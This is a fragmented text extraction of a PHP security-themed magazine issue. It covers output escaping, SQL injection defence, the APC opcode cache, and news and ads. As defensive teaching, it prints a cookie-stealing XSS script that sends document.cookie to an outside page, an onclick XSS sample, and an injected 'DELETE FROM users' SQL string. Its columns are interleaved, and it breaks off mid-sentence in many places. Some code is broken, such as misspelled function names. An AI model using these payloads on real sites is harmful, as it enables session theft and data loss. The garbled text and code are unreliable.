TM
VOLUME 4 ISSUE 10
www.phparchitect.com
FOCUS ON
SECURITY
PROTECT YOUR WORK FROM
SQL INJECTION ATTACKS
Ilia Alshanetsky explains
with this exerpt from
php|architect’s Guide to PHP Security
ESCAPE OUTPUT
Handling External Data
Is your work vulnerable to
HTTP RESPONSE SPLITTING?
THE CREATOR OF PHP
RASMUS LERDORF
ON
OPTIMIZATION WITH
THE ALTERNATIVE
PHP CACHE
NEXCESS.NET Internet Solutions
304 1/2 S. State St.
Ann Arbor, MI 48104-2445
h t t p : / / n e x c e s s . n e t
PHP / MySQL
SPECIALISTS!
Simple, Affordable, Reliable PHP / MySQL Web Hosting Solutions
POPULAR SHARED HOSTING PACKAGES
MINI-ME
$
95
900 MB Storage
30 GB Transfer
Unlimited MySQL Databases
Host 30 Domains
PHP5 / MYSQL 4.1.X
NODEWORX Reseller Access
All of our servers run our in-house developed PHP/MySQL
server control panel: INTERWORX-CP
INTERWORX-CP features include:
- Rigorous spam / virus filtering
- Detailed website usage stats (including realtime metrics)
- Superb file management; WYSIWYG HTML editor
INTERWORX-CP is also available for your dedicated server. Just visit
o for more information and to place your order
.
WHY NEXCESS.NET? WE ARE PHP/MYSQL DEVELOPERS
LIKE YOU AND UNDERSTAND YOUR SUPPORT NEEDS!
ORDER TODAY AND GET 10% OFF ANY WEB HOSTING PACKAGE
VISIT HTTP://NEXCESS.NET/PHPARCH FOR DETAILS
Dedicated & Managed Dedicated server solutions also available
Serving the web since Y2K
/mo
N
EX
R
ESELL
2
$
59
30 DAY
MONEY BACK GUARANTEE
FREE DOMAIN NAME
WITH ANY ANNUAL SIGNUP
4.1.x
3.x/4.0.x
Features
12
Optimization with APC:
An introduction to PHP’s own opcode cache
by RASMUS LERDORF
18
SQL Injection
Exerpted from php|architect’s Guide to PHP Security
by ILIA ALSHANETSKY
26
Flocking to Seagull
Increase your productivity by focusing on
application-specific code
by WILLIAM ZELLER and WERNER M. KRAUSS
36
PHP and News
Applying PHP to Publishing News
by RUBÉN MARTÍNEZ ÁVILA
PRODUCT REVIEW
SendStudio 2004:
Mass Emailing for the Masses
by PETER MACINTYRE
58
EXIT (0);
I would Like to
Thank the Academy...
by MARCO TABINI
THIS MONTH
Download this month’s code at: />Volume 4 - Issue 10
Publisher
Marco Tabini
Editor-in-Chief
Sean Coates
Editorial Team
Arbi Arzoumani
Peter MacIntyre
Eddie Peloke
Graphics & Layout
Aleksandar Ilievski
Managing Editor
Technical support:
Printed in Canada
Copyright
©
2003-2005
Marco Tabini & Associates, Inc.
All Rights Reserved
R
eading the Table of Contents, flipping through the pages, or simply
eyeballing the cover of this issue, you will probably notice a certain
theme: security.
As I’m sure you’ve read in Security Corner over the past issues,
the problems of poorly architected sites, security-ignorant code, and
general carelessness when it comes to externally-supplied data, are rampant in our
community. Failure to abide by a few simple rules (never trust external data; filter
input; escape output; etc.) has left much of the world wide web in a state of
epidemic. The main culprits: remote code execution, SQL Injection and Cross Site
Scripting (“XSS”).
I can almost hear some of you thinking “It can’t be THAT bad! How many times
do you have to beat this dead horse?” and I wish you were correct. The reality of the
situation is that XSS vulnerabilities (if not the other, more severe problems) can be
found on all but a few elite sites (relatively speaking, from a pool of billions of web
pages, of course).
Still don’t think it’s that bad? Then you should have been at php|works in Toronto,
last month. Rasmus (more on him below) gave a keynote talk on PHP Security, and
spent a good chunk of his time explaining the wide dispersion of XSS vulnerabilities.
To illustrate his point (perfectly, I might add), he asked his audience to shout out
the names of their favorite Canadian shopping sites, from which he chose a random
site he’d never visited. Within 90 seconds, Rasmus had effectively demonstrated an
XSS problem on the site. In fact, even the heavy-hitters are not immune: a friend
Some of the changes in PHP 5.0.5
include:
• Upgraded PCRE library to version
5.0.
• Added man pages for “phpize” and
“php-config” scripts.
• Changed ming to support official
0.2a and 0.3 library versions.
• Added PHP_INT_MAX and PHP_INT_
SIZE as predefined constants.
• Fixed memory corruption in stristr().
• Many more changes included as well
as several bug fixes.
Get your hands on the latest release at
php.net
!
MySQL 5.0
Release Candidate
MySQL announces:
“I’m proud and excited to announce the
first Release Candidate of MySQL 5.0. This
milestone signals that we are nearing what
is certainly the most important release in
MySQL’s history.
MySQL 5.0 has new functionality that I
hope will be welcomed, adopted, and put to
productive use by the community of MySQL
users—you. On the commercial side, MySQL
AB is getting a lot of good vibes from new
• najax.html.importForm (imports an
associative array to the corresponding
form elements) and najax.html.
exportForm (exports form values to
an associative array) were added.
• Support for asynchronous call
canceling was added.
Check out the latest release at
/>PHPsh 1.0.1
According to the psychogenic homepage,
PHPsh provides ”Simple, web-based shell
access to your server.”
“It can be very annoying when you are
restricted to FTP access—how can you find
out the full path to a directory, or perform
a command line SQL dump when you’re
trapped in the limited, chrooted environment
provided by an FTP server? PHPsh (PHP shell)
allows you to have shell commands run on
your behalf by any webserver which serves
PHP pages. It solves these issues and more,
allowing you to tap into the power of any
Unix (Linux, BSD, etc.) server!
PHPsh was designed to allow developers,
webmasters and sysadmins a quick and easy
remedy to those situations in which it would
be so easy to solve a problem or answer a
question with shell access but a pointy-haired
hosting company thinks shell access is only
useful for crackers... while simultaneously
functions and classes. Define customized
superglobal variables for general purpose
use. Execute code in restricted environment
(sandboxing).
pecl_http 0.14.1
• Building absolute URIs
• RFC compliant HTTP redirects
• RFC compliant HTTP date handling
• Parsing of HTTP headers and
messages
• Caching by “Last-Modified” and/
or ETag (with ‘on the fly’ option
for ETag generation from buffered
output)
• Support for sending data/files/
streams with (multiple) ranges
• Negotiating user preferred language/
charset
• Convenient request functionality
built upon libcurl
• PHP5 classes: HttpUtil, HttpResponse
(PHP-5.1), HttpRequest,
HttpRequestPool, HttpMessage
Xdebug 2.0.0beta4
The Xdebug extension helps you debug
your scripts by providing valuable debug
information, includin the following:
• stack and function traces in error
messages with:
• full parameter display for user
compatible.
Features:
• create bar (horizontal, vertical),
circle, ellipse and polygon (square,
rectangle) progress meters
• allows usage of existing external
StyleSheet and/or JavaScript
• all elements’ (progress, cells, labels)
HTML properties are customizable
• percentage/labels can be placed
around the progress meter
• compliant with CSS/XHMTL
standards
• integration with template engines is
very easy
• implements the Observer design
pattern: it is possible to add Listeners
• adds a customizable monitor pattern
to display a progress bar; end-user
can abort progress at any time
• allows many progress meters on
the same page without uses of an
iframes
• error handling system that supports
native PEAR_Error, but also PEAR_
ErrorStack, and any other system you
might want to plug-in.
• PHP 5 ready
Image_Graph 0.7.0
Image_Graph provides a set of classes
ESCAPE OUTPUT
TIPS & TRICKS
by BEN RAMSEY
I
n the previous three Tips & Tricks columns, I’ve
taken time to fully explain why all input should
be filtered, and I’ve offered tips on how to filter
your data so that the data you work with and
save isn’t considered tainted. However, security-
conscious programming doesn’t end with filtering data.
Sure, now the data conforms to expectations, but it
may still contain characters that have special meaning
depending on the medium in which your application
chooses to display it. That medium may be HTML, SQL,
XML, WML, etc.
Thus, we must escape output.
What is output? Output is any data that leaves your
application bound for another client or application. The
receiving client or application expects the data to be
of a specific format (HTML, SQL, etc.), and that format
may include characters or other information with special
meaning to the receiving client/application. The data
being sent, however, might—and probably does—
contain special characters that should not be interpreted
with any special meaning by the receiving client.
CODE DIRECTORY: escape
TO DISCUSS THIS ARTICLE VISIT:
/>Data may leave your application in the form of HTML
sent to a Web browser, SQL sent to a database, XML sent
to an RSS reader, WML sent to a wireless device, etc. The
So, you run a Web-based
forum, and you don’t
have a problem with users
entering the occasional
HTML tag. Why should you
escape your output?
Here’s why: Suppose
this forum allows users to
enter HTML tags. That’s fair
enough—you may want
to allow them to enter
bold-faced or italicized
text—but then it outputs
everything in its raw
form—everything. So, all
HTML tags get interpreted
by the web browser.
What if a user enters
the following?
<script>
location.href=’ />cookies.php?cookies=’ + document.cookie;
</script>
Any subsequent user who is logged into the
forum and visits this page will now be redirected to
/> and
any cookies set by the forum can be stolen.
Let’s look at another example. Many sites contain
login forms, which usually consist of two fields—a
username and a password. When a user enters a username
and password, the application may enter the values into
If escaped before storing,
then it might be necessary
to unescape it at some
point in the future. For
example, what if the data
is escaped for HTML output
and stored to a database
table only to be retrieved
later to output in XML or
to PDF, etc.? Then, it must
be unescaped to transport
to those formats—and
possibly escaped again
to accommodate the
new output medium.
This process is bound to
introduce more bugs to
your code and could likely reduce the quality of the data.
Thus, to make the most of your data, it is best to save it
raw (after filtering) and escape only when outputting.
Escaping output is not a terribly difficult process.
At the least, it may require the addition of a few extra
lines of code, or it may require a little more attention
to detail. The important thing to keep in mind is the
format outputted and the special characters that need
to be escaped for that format. For the purposes of this
discussion, I will cover escaping for HTML and SQL, since
PHP has excellent built-in functions for handling output
to these formats.
Escaping HTML
from allowed tags, allowing
onclick
events, etc. to
persist in output. Take the following code snippet, for
example:
$str = ‘<p><b>Bold text</b>
<a href=”#” onclick=”alert(\’XSS\’);”>Link</
a>
<img src=”example.png”/></p>’;
echo strip_tags($str, ‘<p> <a> <b>’);
This code will output the following, complete with
the cross-site scripting (XSS) in the
onclick
attribute:
<p><b>Bold text</b>
<a href=”#” onclick=”alert(‘XSS’);”>Link</
a></p>
Rather than completely stripping the tags from
output, a better alternative may be to escape all the tags,
allowing them to render in the output. This is an easy
task with
htmlspecialchars()
and
htmlentities()
.
Both of these functions serve the same purpose: to
convert special characters into their equivalent HTML
entities. The main difference is that
htmlentities()
is
While this is a form of unescaping, which I mentioned
earlier is not a desirable process, it is nevertheless a
good alternative to using
strip_tags()
to allow
certain tags, as it will ensure that any tags that contain
undesirable attributes are not interpreted by the client.
In addition, there is no guesswork involved here; I am
not using a regular expression that I could potentially
get wrong and, thus, introduce a hole in my application.
I will always know what a
<b>
tag looks like after the
angle brackets have been converted to their HTML entity
equivalents, so it is easy for me to find and convert the
tags back to HTML.
Escaping SQL
Similarly, PHP offers excellent built-in functions for
escaping SQL statements according to the database engine
used. For PostgreSQL, there is
pg_escape_string()
for
MySQL,
mysql_real_escape_string()
and for SQLite,
sqlite_escape_string()
. If the other native database
functions provided in PHP do not offer a similar function,
then PHP offers
addslashes()
bindParam()
parameters to define the type and length
of data.
Prepared statements also exist in PEAR::DB and
other database abstraction classes, but PDO offers much
promise since it is built into the language and, thus,
much faster with less overhead.
So, if possible, use prepared statements (with PDO,
if possible). If they aren’t available, use the database’s
built-in escaping function. If that isn’t available, then
fall back on
addslashes()
as a last resort.
For future installments of Tips & Tricks, I would like to
know what tips and tricks you are using. Please send
your tip and/or trick to
, and,
if I use it, you’ll receive a free digital subscription to
php|architect.
A Security-Conscious Mindset
The key to secure programming is having a security-
conscious mindset. Filtering input and escaping output
is just part of that mindset, but it takes more thought
than simply copying code from elsewhere to introduce
security to an application. It takes careful planning and
diligent testing.
By now, I hope that you are well on your way to being
a security-conscious programmer. I have introduced some
tools and concepts to help you get started, and it is likely
13 $stmt->bindParam(‘:username’, $clean[‘username’],
14 PDO_PARAM_STR, 25);
15 $stmt->bindParam(‘:password’, $clean[‘password’],
16 PDO_PARAM_STR, 16);
17 $stmt->execute();
18
19 ?>
LISTING 2
Volume 4 Issue 10 • php|architect • 11
Tips & Tricks
BEN RAMSEY
is a Technology Manager for Hands On Network
in Atlanta, Georgia. He is an author, Principal member of the PHP
Security Consortium, and Zend Certified Engineer. Ben lives just north
of Atlanta with his wife Liz and dog Ashley. You may contact him at
or read his blog at />A
n opcode cache works by intercepting the
compile and execute hooks in the Zend engine
and then storing the result of the compilation
phase in a shared memory cache.
On subsequent requests to the same file,
a check is done to see if the opcodes corresponding
to the script are in the cache. There is also a check to
determine if the file on disk has a modification time
that is newer than the timestamp on the opcodes in the
cache.
There are a number of opcode caches available for
PHP. They are sometimes referred to as compilers or
accelerators, but I find the term, opcode cache, to be
FEATURE
PHP: 4.3+
OTHER SOFTWARE: APC
LINK: />CODE DIRECTORY: apc
TO DISCUSS THIS ARTICLE VISIT:
/>Adding an opcode cache to your PHP configuration is the
easiest way to speed up your PHP applications without
changing a single line of your code.
Common Configuration Options
The APC configuration directives that I normally place in
my
php.ini
file can be seen in Listing 3.
This setup gives me a 64M single file-backed memory-
mapped segment, geared for a server with 500 cacheable
files. I’ve turned opcode optimization off, because the
ABOUT THE AUTHOR:
RASMUS LERDORF
is known
for having gotten the PHP project
off the ground in 1995, the mod_
info Apache module and he can be
blamed for the ANSI92 SQL-defying
LIMIT clause in mSQL 1.x which
has now, at least conceptually,
crept into both MySQL and Post-
greSQL. Prior to joining Yahoo!
as an infrastructure engineer in 2002, he was at a string of
companies including Linuxcare, IBM, and Bell Canada working
on Internet technologies.
is tricky—generally, you would just always use
mkstemp
mask as I have shown in Listing 3. It is file-backed,
but the file is unlinked right after the
mmap
call, which
ensures that the shared memory segment automatically
be cleaned up (removed) when the APC (or APC-hosting)
process exits. If, for some reason, you want to force a
real anonymous mmap, you can leave it empty. You can
specify
/dev/zero
to
mmap
from there, if your OS prefers
that, or if you use something like
/apc.shm.XXXXXX
it
will use
shm_open()
instead. On Linux, that path has
to be in the root directory, and you must have
shmfs
enabled (either compiled into the kernel, or loaded as
a module).
You can also prevent APC from caching certain files
by using the
apc.filters
18 Build process completed successfully
19 Installing ‘/var/tmp/pear-build-root/install-APC3.0.6//usr/
local/php5/lib/php/extensions/no-debug-non-zts-20050617/apc.so’
20 install ok: APC 3.0.6
LISTING 1
1 $ cvs -d:pserver::/repository login
2 Logging in to :pserver::2401/repository
3 CVS password: phpfi
4 $ cvs -d:pserver::/repository co \
5 pecl/apc
6 cvs checkout: Updating pecl/apc
7 U pecl/apc/.cvsignore
8 U pecl/apc/CHANGELOG
9 …
10 10:44pm ubuntu:/tmp> cd pecl/apc
11 10:44pm ubuntu:/tmp/pecl/apc> phpize
12 Configuring for:
13 PHP Api Version: 20041225
14 Zend Module Api No: 20050617
15 Zend Extension Api No: 220050617
16 $ ./configure --enable-apc-mmap \
17 --with-php-config=/usr/local/php5/bin/php-config \
18 --with-apxs
19 …
20 configure: creating ./config.status
21 config.status: creating config.h
22 10:45pm ubuntu:/tmp/pecl/apc> make
23 10:47pm ubuntu:/tmp/pecl/apc> make install
24 Installing shared extensions: /usr/local/php5/lib/php/
extensions/no-debug-non-zts-20050617/
Volume 4 Issue 10 • php|architect • 14
Alternative PHP Cache
The APC Info Page
In the
pecl/apc
directory, you will find a script called
apc.php
(Figure 1). This file, when executed, gives
you a nice overview of what is in your cache, and how
much of your shared memory segment is being used. It
would probably be a good idea to put this script behind
htaccess
authentication, if you are going to put it in a
web-accessible directory, but it also has its own built-
in auth system. Read the first section of the code in
apc.php
, itself for more information.
Uniquely Identifying Files
A file, whether it is the initial script file, or an included
file, is identified by its device and inode (the file’s
unique position identifier within the filesystem), not its
filename.
This method is used, so files can be uniquely identified
in a single
stat()
call. If we were to try to differentiate
files by their filename, we would need the fully qualified
pathname and that can be extremely expensive to get,
since it would involve calling
realpath()
you could end up caching this partially written file so
all subsequent requests will get the same partial set of
opcodes from the cache.
In order to reduce the impact of this scenario, APC has
an option called
file_update_protection
. This feature
is enabled, and set to 2 seconds by default—meaning
that files that have been modified within 2 seconds of
the request will not be cached. This should prevent any
partially written files from polluting the cache.
Employing this feature, however, doesn’t fix the
real problem—non-atomic file modification on a live
web server. The correct way to address this issue is to
only replace files atomically, by writing to a temp file
and then renaming the file to its intended destination
filename, or by using automated tools such as
rsync
,
that correctly handle the details of this maneuver, for
you. UNIX commands and applications such as
cp
,
tar
,
vi
and
emacs
often do not create files atomically.
Cache Slams
the likelihood that a request that hits an uncached
file will skip trying to cache it. Very much like the
file_update_protection
setting, this is a mechanism
to ease the pain of something that really should be
handled differently, by the user (the person who deploys
the changed file, in this case). You can completely
eliminate both the partial update and the cache slam
problems by writing to a temporary file first; then, load
that temporary file once, through your webserver (and
thus, APC), to force it to be cached, and then rename
the file to its final destination. You might expect that
the file would be re-cached once its name is changed,
Volume 4 Issue 10 • php|architect • 15
Alternative PHP Cache
but recall that APC uses the device and inode of the file,
not its name to uniquely identify it. When you rename a
file, the inode doesn’t change, nor does the modification
time.
Userspace Access to the Cache
There are a couple of ways to make use of the cache from
your userspace PHP scripts.
The first way is to poke it for information about what
it is doing. The
apc.php
script that comes with APC is
an example of how to use the
apc_cache_info()
and
apc_sma_info()
<section name=”database”>
<host>localhost</host>
<username>root</username>
</section>
</config>
The parser this is basically a one-liner. Well, a slightly
long line and split up into 3 to make it easier to read.
Ok, so it is a 3-liner:
$xml = simplexml_load_file(‘conf.xml’);
foreach($xml->section as $entry)
$config[(string)$entry[‘name’]] =
(array)$entry;
This should be mostly self-explanatory: Load the XML file
using
simplexml
, loop through each section and use the
$entry[‘name’]
shortcut for picking the
name
attribute
FIGURE 1
Volume 4 Issue 10 • php|architect • 16
Alternative PHP Cache
out of the entry, and make this
name
the key for each
section sub-array. Then, since below each section in our
example, we just have flat XML with no attributes, nor
sub-nodes, we can just cast it directly to an array and
stick the data directly into our
(array)$entry;;
apc_tore(‘config’,$config);
}
You may want to add a bit of error checking to make
sure that the
conf.xml
file actually exists, and if you
are going to do that, it means a
stat()
call. You might
as well make use of that extra system call and pull in
the modification time, using
filemtime()
. So, our final
approach would look like this:
mtime=@filemtime(‘conf.xml’) or die(“conf.xml is
missing!”);
if((!$config=apc_fetch(‘config’))||$config[‘mtim
e’]<$mtime) {
$xml = simplexml_load_file(‘conf.xml’);
$config[‘mtime’] = time();
foreach($xml->section as $entry)
$config[(string)$entry[‘name’]] =
(array)$entry;
apc_tore(‘config’,$config);
}
Now we can change our
conf.xml
file all we want, and it
will be reparsed on the request that immediately follows
an application like this. Unfortunately, Gallery stores its
config in nested classes that will need to be serialized
and unserialized. Improving on this makes Gallery a bit
faster, but probably not worth the maintenance headache
of having locally modified files. It is just a couple of
lines in Gallery’s
config.php
file, though. At the top:
if($tmp = apc_fetch(‘gallery’)) {
$gallery=unserialize($tmp);
return;
}
And at the bottom:
apc_store(‘gallery’,serialize($gallery));
You get a bigger win with applications that use arrays
for their configuration—especially if they have localized
the config file inclusion to one or two places so you can
eliminate an entire include with something like:
if(!$config=apc_fetch(‘config’)) include ‘config.
inc’;
And, of course, at the bottom of config.inc you would
need to add:
apc_tore(‘config’,$config);
Volume 4 Issue 10 • php|architect • 17
Alternative PHP Cache
This serialization of objects will be done by APC,
internally, soon so it will go a bit faster by eliminating
the extra userspace unserialize call, but it will still be
nowhere near as fast as using an array that gets copied
directly out of shared memory.
for people who want to host their own weblogs. I get
10 requests/second on a plain PHP installation, and
37 requests/second after adding APC. Although the
configuration system is array-based, there is plenty of
logic intertwined, so it is also difficult to cache this
information in s9y.
Finally, let’s look at a code snippet written with APC
in mind. I recently needed a flexible and fast RSS/Atom
feed reader. It uses
simplexml
and a couple of PHP5.1
tricks to reduce the RSS or Atom XML data down into
an easily cacheable array. The code is a bit long to
include here, but fire up a browser and have a look at it–
The inline comments
should help make sense of the code. It is basically just a
complicated example of the XML-based config file parser
we developed earlier, but now, we get some numbers.
You will notice there are two levels of caching.
It caches the parsed XML to shared memory with
apc_store()
and it also caches the downloaded raw XML
to disk. I tend to do this because I have multiple things
reading these various XML files and they sometimes have
different ideas of what is interesting in them. This way I
can have different parsers that parse the disk-cached XML
into their own shared memory slots, but don’t need to hit
the backend server for each separate application. On my
lerdorf.com server I have ,
and itself all
0
(unlimited), brings that number up to 590 requests per
second.
Conclusion: Speed is Good!
Opcode caching plus injecting user caching in the
right places in your application can result in dramatic
performance gains.
In my RSS example, I went from 25 requests/second
to nearly 600. In a full application, there are performance
gains to be had all along the way. You need to look at
where your data comes from, how often it changes, and
how close to the final presentation format you can get
it to, before it is cached. Applications that were not
designed with this in mind from the start can be difficult
to retrofit. Keep your designs simple and clean. Do not
use objects as datastores, and try to avoid spaghetti
include sequences—your applications will be easier to
deploy and will run much faster.
SQL Injection
Volume 4 Issue 10 • php|architect • 18
FEATURE
TO DISCUSS THIS ARTICLE VISIT:
/>T
he goal of SQL injection is to insert arbitrary
data, most often a database query, into a string
that’s eventually executed by the database.
The insidious query may attempt any number
of actions, from retrieving alternate data, to
modifying or removing information from the database.
To demonstrate the problem, consider this excerpt:
php|architect’s Guide to PHP Security, you will learn how to thwart
this type of attack.
by
ILIA ALSHANETSKY
author of
php|architect’s
Guide to PHP Security
SQL INJECTION
Volume 4 Issue 10 • php|architect • 19
SQL Injection
Magic Quotes
Given the potential harm that can be caused by SQL
injection, PHP’s automatic input escape mechanism,
magic_quotes_gpc
, provides some rudimentary
protection. If enabled,
magic_quotes_gpc
, or “magic
quotes”, adds a backslash in front of single-quotes,
double-quotes, and other characters that could be used
to break out of a value identifier. But, magic quotes
is a generic solution that doesn’t include all of the
characters that require escaping, and the feature isn’t
always enabled. Ultimately, it’s up to you to implement
safeguards to protect against SQL injection.
To help, many of the database extensions available for
PHP include dedicated, customized escape mechanisms.
For example, the MySQL extension for PHP provides the
function
mysql_real_escape_string()
pg_escape_bytea()
function applies a Base64-like
encoding to binary data:
// for plain-text data use:
pg_escape_string($regular_strings);
// for binary data use:
pg_escape_bytea($binary_data);
A binary data escaping mechanism should also be used
to process multi-byte languages that aren’t supported
natively by the database system. (Multi-byte languages
such as Japanese use multiple bytes to represent a single
character; some of those bytes overlap with the ASCII
range normally only used by binary data.)
There’s a disadvantage to encoding binary data: it
prevents persisted data from being searched other than
by a direct match. This means that a partial match query
such as
LIKE ‘foo%’
won’t work, since the encoded
value stored in the database won’t necessarily match the
initial encoded portion looked for by the query.
For most applications, though, this limitation isn’t a
major problem, as partial searches are generally reserved
for human readable data and not binary data, such as
images and compressed files.
Prepared Statements
While database-specific escape functions are useful, not
all databases provide such a feature. In fact, database-
specific escape functions are relatively rare. (At the
moment) only the MySQL, PostgreSQL, SQLite, Sybase,
In addition to enhancing query safety, prepared
queries improve performance. Each prepared query is
parsed and compiled once, but can be re-used over and
over. If you need to perform an
INSERT
en masse, a pre-
compiled query can save valuable execution time.
Preparing a query is fairly simple. Here is an
SQL Injection
Volume 4 Issue 10 • php|architect • 20
example:
pg_query($conn, “PREPARE stmt_name (text) AS “
.” SELECT * FROM users WHERE name=$1”);
pg_query($conn, “EXECUTE stmt_name ({$name})”);
pg_query($conn, “DEALLOCATE stmt_name”);
PREPARE stmt_name (text) AS ...
creates a prepared
query named
stmt_name
that expects one text value.
Everything following the keyword
AS
defines the actual
query, except
$1
is the placeholder for the expected
text.
If a prepared statement expects more than one
value, list each type in order, separated by a comma,
and use
As nice as prepared queries are, not all databases
support them; in those instances escaping mechanisms
should be used.
No Means of Escape
Alas, escape functions do not always guarantee data
safety. Certain queries can still permit SQL injection,
even after escapes are applied.
Consider the following situation, where a query
expects an integer value:
$id = “0; DELETE FROM users”;
$id = mysql_real_escape_string($id); // 0;
DELETE FROM users
mysql_query(“SELECT * FROM users WHERE
id={$id}”);
When executing integer expressions, it’s not necessary
to enclose the value inside single quotes. Consequently,
the semicolon character is sufficient to terminate the
query and inject an additional query. Since the semicolon
doesn’t have any “special” meaning, it’s left as-is by both
the database escape function and
addslashes()
.
There are two possible solutions to the problem.
The first requires you to quote all arguments. Since
single quotes are always escaped, this technique prevents
SQL injection. However, quoting still passes the user
input to the database, which is likely to reject the query.
Here is an illustrative example:
$id = “0; DELETE FROM users”;
$id = pg_escape_string($id); // 0; DELETE FROM
Numeric casting is not only very effective, it’s
also efficient, since a cast is a very fast, function-free
operation that also obviates the need to call an escape
routine.
The LIKE Quandary
The SQL
LIKE
operator is extremely valuable: its
%
and
_
(underscore) qualifiers match 0 or more characters and
any single character, respectively, allowing for flexible
partial and substring matches. However, both
LIKE
qualifiers are ignored by the database’s own escape
functions and PHP’s magic quotes. Consequently, user
input incorporated into a
LIKE
query parameter can
subvert the query, complicate the
LIKE
match, and in
many cases, prevent the use of indices, which slows a
query substantially. With a few iterations, a compromised
LIKE
query could launch a Denial of Service attack by
overloading the database.
_ish
, cannot
be accelerated by the
index, slowing the query.
And a trailing underscore
may substantially alter
the results of the query.
To complicate matters
further, underscore is a
very common character
and is frequently found in
perfectly valid input.
To address the
LIKE
quandary, a custom
escaping mechanism must
convert user-supplied
%
and
_
characters to literals. Use
addcslashes()
, a function
that lets you specify a
character range to escape.
$sub = addcslashes(mysql_real_escape_
string(“%something_”),
“%_”);
// $sub == \%something\_
or die(“Failed query: {$query}<br />”.mysql_
error());
While very convenient for spotting errors, this code can
cause several problems when deployed in a production
environment. (Yes, errors do occur in production code
for any number of
reasons.) Besides being
embarrassing, the code
may reveal a great deal
of information about the
application or the site.
For instance, the end-user
may be able discern the
structure of the table and
some of its fields and may
be able to map GET/POST
parameters to data to
determine how to attempt
a better SQL injection
attack. In fact, the SQL
error may have been
caused by an inadvertent
SQL injection. Hence, the
generated error becomes a
literal guideline to devising
more tricky queries.
The best way to avoid revealing too much information
is to devise a very simple SQL error handler to handle SQL
failures:
function sql_failure_handler($query, $error) {
string is appended to a log file.
The next step depends on whether or not the script is
working in debug mode or not. If in debug mode, the error
message is returned and is likely displayed on-screen for
the developer to read. In production, though, the specific
message is replaced with a generic message, which hides
the root cause of the problem from the visitor.
Authentication Data Storage
Perhaps the final issue to consider when working with
databases is how to store your application’s database
credentials—the login and password that grant access
to the database. Most applications use a small PHP
configuration script to assign a login name and password
to variables. This configuration file, more often than
not (at least on shared hosts), is left world-readable
to provide the web server user access to the file. But
world-readable means just that: anyone on the same
system or an exploited script can read the file and steal
the authentication information stored within. Worse,
many applications place this file inside web readable
directories and give it a non-PHP extension—
.inc
is a
popular choice. Since
.inc
is typically not configured to
be interpreted as a PHP script, the web browser displays
such a file as plain-text for all to see.
One solution to this problem uses the web server’s
own facilities, such as
exploit by local users.
One seemingly effective solution is to encrypt the
sensitive data. Database authentication credentials could
be stored in encrypted form, and only the applications
that know the secret key can decode them. But this use
of encryption only makes theft slightly more difficult
and merely shifts the problem instead of eliminating it.
The secret key necessary to decrypt the credentials must
still be accessible by PHP scripts running under the web
server user, meaning that the key must remain world-
readable. Back to square one…
A proper solution must ensure that other users on
the system have no way of seeing authentication data.
Fortunately, the Apache web server provides just such
a mechanism. The Apache configuration file, httpd.conf
can include arbitrary intermediate configuration files
during start-up while Apache is still running as root.
Since root can read any file, you can place sensitive
information in a file in your home directory and change
it to mode
0600
, so only you and the superuser can read
and write the file.
One common way for hackers to spot
code vulnerable to SQL injection is by using
the developer’s own tools against them.
Volume 4 Issue 10 • php|architect • 23
SQL Injection
<VirtualHost ilia.ws>
Include /home/ilia/sql.cnf
from the script that needs them. Use PHP’s
ini
directives
to specify the default authentication information for the
database extension. These directives can also be set
inside the hidden Apache configuration file.
php_admin_value mysql.default_host “127.0.0.1”
php_admin_value mysql.default_user “login”
php_admin_value mysql.default_password
“password”
Now,
mysql_connect()
works without any arguments, as
the missing values are taken from PHP
ini
settings. The
only information remaining exposed would be the name
of the database.
Because the application is not aware of the database
settings, it consequently cannot disclose them through a
bug or a backdoor, unless code injection is possible. In fact,
you can enforce that only an
ini
-based authentication
procedure is used by enabling SQL safe mode in PHP
via the
sql.safe_mode
directive. PHP then rejects any
database connection attempts that use anything other
than
By limiting what a user can do, you can detect, track,
and defang many SQL injection attacks. Limiting access
at the database level is supplemental: you should use it
in addition to all of the database security mechanisms
listed in this chapter.
Maintaining Performance
Speed isn’t usually considered a security measure, but
subverting your application’s performance is tantamount
to any other exploit. As was demonstrated by the
LIKE
attack, where
%
was injected to make a query very slow,
enough costly iterations against the database could
saturate the server and prevent further connections.
Unoptimized queries present the same risk: if the attacker
spots inefficiencies, your server can be exhausted and
rendered useless just the same.
To prevent database overloading, there are a few
simple rules to keep in mind.
Only retrieve the data you need and nothing more.
Many developers take the “
*
” shortcut and fetch all
columns, which may result in a lot of data, especially
when joining multiple tables. More data means more
information to retrieve, more memory for the database’s
temporary buffer for sorting, more time to transmit the
results to PHP, and more memory and time to make the
anew.
The code below creates a persistent MySQL database
connection via the
mysql_pconnect()
function, which is
syntactically identical to the regular
mysql_connect()
function.
mysql_pconnect(“host”, “login”, “passwd”);
Other databases typically offer a persistent connection
variant, some as simple as adding the prefix “p” to the
word “connect”.
Anytime PHP tries to establish a persistent connection,
it first looks for an existing connection with the same
authentication values; if such a connection is available,
PHP returns that handle instead of making a new one.
Words of Caution
Persistent connections are not without drawbacks. For
example, in PHP, connection pooling is done on a per-
process basis rather than per-web server, giving every
web-server process its own connection pool. So, 50 Apache
processes result in 50 open database connections. If the
database is not configured to allow at least that many
connections, further connection requests are rejected,
breaking your web pages.
In many cases, the database runs on the same machine
as the web server, which allows data transmission to be
optimized. Rather than using the slow and bulky TCP/IP,
your application can use Unix Domain Sockets (UDG), the
the results saved in the cache are returned, saving time
and effort.
ILIA ALSHANETSKY
is the principal of Advanced Internet Designs
Inc., which specializes in security auditing, performance analysis
and application development. He is the author of FUDforum
(
), a highly popular, Open Source bulletin board,
focused on providing the maximum functionality at the highest levels
of security and performance. Ilia is a core PHP Developer, an active
member of PHP’s QA team, and was the Release Master for the PHP
4.3.x series. He has authored and co-authored a number of extensions,
most notably SHMOP, PDO, SQLite and GD, and is responsible for a
large number of bug fixes and performance tweaks in the language.
A prolific lecturer and writer, Ilia can found speaking at international
conferences. He is frequently published in print and online magazines
on a variety of PHP topics, and is also the author of an upcoming book
on PHP security. Ilia can be reached at
.
dynamic web pages - german php.node
news . scripts . tutorials . downloads . books . installation hints
Dynamic Web Pages
www.dynamicwebpages.de
sex could not be better
|